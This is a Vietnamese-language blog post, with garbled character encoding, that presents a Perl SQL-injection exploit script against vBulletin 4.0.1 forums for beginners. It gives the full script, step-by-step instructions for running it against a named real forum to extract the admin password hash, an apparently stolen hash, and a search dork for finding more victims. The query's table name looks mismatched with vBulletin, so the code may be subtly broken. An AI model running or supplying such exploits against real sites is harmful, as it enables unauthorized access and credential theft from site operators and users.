Exploit vbb 4.0.x b?ng perl cho newbie

h?y perl xong
T?o file perl v?i n?i dung

 #!/usr/bin/perl
use IO::Socket;

print q{
#######################################################################
#    vBulletin? Version 4.0.1 Remote SQL Injection Exploit                                      #
#                    By th3.g4m3_0v3r                                                                          #
#              our Site www.h4ck3r.in                                                                         #
#           www.hackingcrackingtricks.blogspot.com                                                  #
#           Indian (th3.g4m3_0v3r@yahoo.com)                                                          #
#          Dork: Powered by vBulletin? Version 4.0.1                                                  #          

#######################################################################
};
if (!$ARGV[2]) {
print q{
    Usage: perl  VB4.0.1.pl host /directory/ victim_userid

       perl  VB4.0.1.pl www.vb.com /forum/ 1

};
}


$server = $ARGV[0];
$dir    = $ARGV[1];
$user   = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid   = $ARGV[5];
print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>]    DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";

$server =~ s/(http:\/\/)//eg;

$path  = $dir;
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ? ?,0,0+FROM%20deluxebb_users%20WHERE%20(uid= '".$user ;

print "[~] PREPARE TO CONNECT...\r\n";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";
print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";


print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{

  if ($1 ne 0) {
   print "Password is: ".$1."\r\n";
print "--------------------------------------------------------------------------------------\r\n";

      }
exit();
}
}
print "------------------------------------------------------------------------------------------------\r\n";

L�u v� d? nh� capuchino.pl hihi

T?m 1 site vbb 4.0.x
M?nh v� d? ? ��y l� http://www.flashyworld.com/vb/index.php

m? cmd l�n,v�o th� m?c l�u file capuchino.pl
ch?y capuchino.pl flashyworld.com /vb/ 1
c?u tr�c ? ��y l� file.pl site.com /folderforum/ userid
userid admin th? th�?ng l� 1
sau khi ch?y th? ta th?y

Pass nh?n �c l� : e714ad492ee5e2d84bca13c17fd6464a v�o b?ng cookie th�i

dork t?m victim :"Powered by vBulletin� Version 4.0.1"
bonus th�m 1 victim c?n khai th�c �c
 

Capuchino - VHB Group

Tweet

Related Posts

Exploit vbb 4.0.x b?ng perl cho newbie

4/ 5

Oleh Unknown

Unknown Pada 20:50 Bình Luận